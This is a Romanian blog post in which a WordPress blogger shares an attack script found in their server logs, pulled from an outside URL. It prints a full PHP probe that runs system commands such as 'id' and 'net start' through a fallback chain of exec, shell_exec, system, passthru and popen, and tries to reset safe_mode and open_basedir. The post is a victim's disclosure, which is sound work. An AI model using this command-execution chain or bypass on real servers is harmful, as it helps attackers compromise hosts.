Hack blog - wordpress!?
Ceva de genul au incercat niste “baieti destepti” sa faca pe blog la mine. Luati de priviti. ![]()
PS: Gasit prin loguri de la adresa: http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt
< ?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
Din cate am citit pe internet tinta nu ar fi platforma wordpress, dar totusi stau si ma gandesc ca prea-s apropiate in loguri. Adica asta care v-am aratat acum si asta.
Articole asemanatoare:
- PHP Script - curs valutar Facut mai in joaca, dar poate ajuta pe cineva. Scriptul...
- Blog Wordpress: Dezactiveaza post revision Majoritatea bloggerilor nu folosesc post revision, iar multi dintre ei...
- Teoblog.net was hacked Se pare ca un folder din teoblog.net a fost hackerit....
- Download, instalare si configurare wordpress Acest tutorial va raspunde exact cerintelor dumneavoastra de a va...
- Wordpress 2.5.1 vulnerabil!? Nu stiu de ce imi arata asa, dar stau si...



1 comentarii la “Hack blog - wordpress!?”
Chiar e tare!Am luat aminte!sa ne mai bucuri cu asemenea articole!
Lasă un comentariu